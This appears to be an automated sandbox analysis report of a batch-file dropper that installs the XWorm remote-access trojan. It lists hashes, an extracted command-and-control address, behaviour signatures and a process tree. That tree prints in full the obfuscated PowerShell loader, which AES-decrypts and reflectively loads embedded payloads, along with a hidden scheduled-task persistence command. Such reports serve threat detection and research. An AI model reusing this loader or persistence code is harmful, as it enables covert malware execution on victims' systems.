Analysis
-
max time kernel
9s -
max time network
11s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/11/2024, 12:59
Static task
static1
General
-
Target
F_0a Pahnotom.bat
-
Size
314KB
-
MD5
e15c30227305c76972d8ecf85d4b31bc
-
SHA1
d192b94c852427ee1607c1bb45fb504130f66d33
-
SHA256
7096d59bcb168595ff5f95c7eb287ebe8de315f0af34b4d5c78a7363ae24cad5
-
SHA512
30fc1d2fa65d826cfc055be59c729f3a697988830a8e7b9093c088969d43a29fc43798bde7639dc38236f30d40c510bd5502f83244674bbc33a425f3a2a177ca
-
SSDEEP
6144:rS54Nvug0//LU31XygG+Ooyf5z7q3DACE2lq:rqKmX//O1Crou5zADbzq
Malware Config
Extracted
xworm
135.125.21.87:7000
-
Install_directory
%Temp%
-
install_file
Anticheat.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2912-49-0x000001DC77730000-0x000001DC77748000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 2912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2808 powershell.exe 4512 powershell.exe 2912 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2808 powershell.exe 2808 powershell.exe 4512 powershell.exe 4512 powershell.exe 2912 powershell.exe 2912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe Token: 36 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe Token: 36 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3080 wrote to memory of 2808 3080 cmd.exe 87 PID 3080 wrote to memory of 2808 3080 cmd.exe 87 PID 2808 wrote to memory of 4512 2808 powershell.exe 92 PID 2808 wrote to memory of 4512 2808 powershell.exe 92 PID 2808 wrote to memory of 1452 2808 powershell.exe 95 PID 2808 wrote to memory of 1452 2808 powershell.exe 95 PID 1452 wrote to memory of 924 1452 WScript.exe 96 PID 1452 wrote to memory of 924 1452 WScript.exe 96 PID 924 wrote to memory of 2912 924 cmd.exe 98 PID 924 wrote to memory of 2912 924 cmd.exe 98
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F_0a Pahnotom.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LL2KZPrVdFPIKJLii9dN4PGBhXxarvkM1Q6SVMRXcA8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Scmn9a88MLF9VIvvfFCOug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aCiJV=New-Object System.IO.MemoryStream(,$param_var); $xZMhD=New-Object System.IO.MemoryStream; $bjqDk=New-Object System.IO.Compression.GZipStream($aCiJV, [IO.Compression.CompressionMode]::Decompress); $bjqDk.CopyTo($xZMhD); $bjqDk.Dispose(); $aCiJV.Dispose(); $xZMhD.Dispose(); $xZMhD.ToArray();}function execute_function($param_var,$param2_var){ $Mgxhh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FAdaA=$Mgxhh.EntryPoint; $FAdaA.Invoke($null, $param2_var);}$JRzRA = 'C:\Users\Admin\AppData\Local\Temp\F_0a Pahnotom.bat';$host.UI.RawUI.WindowTitle = $JRzRA;$jWAVd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JRzRA).Split([Environment]::NewLine);foreach ($ShfsL in $jWAVd) { if ($ShfsL.StartsWith(':: ')) { $gTQsD=$ShfsL.Substring(3); break; }}$payloads_var=[string[]]$gTQsD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_846_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_846.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_846.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_846.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LL2KZPrVdFPIKJLii9dN4PGBhXxarvkM1Q6SVMRXcA8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Scmn9a88MLF9VIvvfFCOug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aCiJV=New-Object System.IO.MemoryStream(,$param_var); $xZMhD=New-Object System.IO.MemoryStream; $bjqDk=New-Object System.IO.Compression.GZipStream($aCiJV, [IO.Compression.CompressionMode]::Decompress); $bjqDk.CopyTo($xZMhD); $bjqDk.Dispose(); $aCiJV.Dispose(); $xZMhD.Dispose(); $xZMhD.ToArray();}function execute_function($param_var,$param2_var){ $Mgxhh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FAdaA=$Mgxhh.EntryPoint; $FAdaA.Invoke($null, $param2_var);}$JRzRA = 'C:\Users\Admin\AppData\Roaming\startup_str_846.bat';$host.UI.RawUI.WindowTitle = $JRzRA;$jWAVd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JRzRA).Split([Environment]::NewLine);foreach ($ShfsL in $jWAVd) { if ($ShfsL.StartsWith(':: ')) { $gTQsD=$ShfsL.Substring(3); break; }}$payloads_var=[string[]]$gTQsD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2912
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
314KB
MD5e15c30227305c76972d8ecf85d4b31bc
SHA1d192b94c852427ee1607c1bb45fb504130f66d33
SHA2567096d59bcb168595ff5f95c7eb287ebe8de315f0af34b4d5c78a7363ae24cad5
SHA51230fc1d2fa65d826cfc055be59c729f3a697988830a8e7b9093c088969d43a29fc43798bde7639dc38236f30d40c510bd5502f83244674bbc33a425f3a2a177ca
-
Filesize
115B
MD555cfb61121013050a5eee40ad7edb75f
SHA11ba998c58e5d08432299dc4a6c825cffc22d1247
SHA2560a8a77a2265f5dec9203b0f89a8815bf754743496a5c362404d4d79688536096
SHA5121282ae290b9d719e5e5fa6f6d767bdc8cc2e41728ff37910a39b594e78d17635082d6249470a3ba1e4a2cf8e2f6e7318a27b6d40547f9a5ab2d33133763523d9